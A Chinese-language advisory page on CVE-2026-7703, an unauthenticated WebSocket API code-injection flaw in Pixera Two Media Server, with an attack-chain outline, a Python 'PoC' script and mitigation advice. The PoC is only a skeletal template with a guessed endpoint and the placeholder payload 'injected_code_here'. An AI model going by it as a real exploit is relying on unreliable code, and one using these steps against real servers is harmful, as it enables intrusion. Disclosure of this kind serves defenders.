CVE-2026-7703 CVSS 7.3 高危

CVE-2026-7703 AV Stumpfl Pixera 代码注入漏洞

披露日期: 2026-05-03

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-7703

漏洞类型

代码注入

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

AV Stumpfl Pixera Two Media Server

漏洞概述

AV Stumpfl Pixera Two Media Server 25.2 R2及之前版本在Websocket API组件中存在安全缺陷。由于未正确过滤用户输入，攻击者可远程利用该漏洞进行代码注入。此攻击无需用户交互及身份认证，攻击复杂度低。目前漏洞利用细节已公开，可能导致系统机密性、完整性及可用性受损，建议用户尽快升级修复。

技术细节

该漏洞的核心在于AV Stumpfl Pixera Two Media Server的WebSocket API接口对传入数据的处理逻辑存在缺陷。攻击者无需预先认证即可访问该接口。通过构造特制的WebSocket消息帧并发送到服务器，攻击者可以触发API中未知函数的代码注入漏洞。由于系统未能对关键参数进行严格的边界检查或过滤，恶意载荷被服务器解析并执行。CVSS 3.1评分7.3表明此漏洞具有高风险，攻击者成功利用后，可在服务器上下文中执行任意代码，进而控制受影响的服务器。

攻击链分析

STEP 1

信息收集

攻击者扫描网络或使用Shodan等搜索引擎，寻找暴露在互联网上的AV Stumpfl Pixera Media Server实例。

STEP 2

建立连接

攻击者识别目标后，无需任何身份验证，直接连接到目标服务器的WebSocket API端口。

STEP 3

发送恶意载荷

攻击者向WebSocket端点发送特制的、包含恶意代码的数据包，利用API中的未知函数缺陷。

STEP 4

代码执行

服务器端解析并执行了注入的恶意代码，攻击者从而获得服务器的部分控制权。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import asyncio
import websockets

# PoC for CVE-2026-7703
# Target: AV Stumpfl Pixera Two Media Server <= 25.2 R2
# Description: Sends a malicious payload via WebSocket to trigger code injection.

async def exploit(target_ip, target_port):
    # WebSocket endpoint (actual path may vary based on version)
    uri = f"ws://{target_ip}:{target_port}/ws/api" 
    
    # Example payload structure (actual injection vector depends on specific API logic)
    # This payload attempts to inject a command.
    payload = '{"action": "execute", "command": "injected_code_here"}'

    try:
        async with websockets.connect(uri) as websocket:
            print(f"[+] Connecting to {target_ip}...")
            
            # Send the malicious payload
            await websocket.send(payload)
            print(f"[+] Payload sent: {payload}")
            
            # Wait for response (optional, to verify connection)
            response = await websocket.recv()
            print(f"[+] Received response: {response}")
            
    except Exception as e:
        print(f"[-] Exploit failed: {e}")

# Example usage
# asyncio.run(exploit("192.168.1.10", 8080))

影响范围

AV Stumpfl Pixera Two Media Server <= 25.2 R2

防御指南

临时缓解措施

如果无法立即升级，建议将Pixera服务器部署在内网环境，并严格限制对WebSocket API端口的网络访问，防止外部攻击者利用此漏洞。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-7703
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-7703
3 Details https://www.cvedetails.com/cve/CVE-2026-7703/
4 VulDB https://vuldb.com/cve/CVE-2026-7703
5 Link https://gist.github.com/TrebledJ/585a20525e45549f299d282233632608
6 Link https://help.pixera.one/changelogs-version-overviews/pixera-252-overview-changelog
7 Link https://vuldb.com/submit/805274
8 Link https://vuldb.com/vuln/360872
9 Link https://vuldb.com/vuln/360872/cti

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表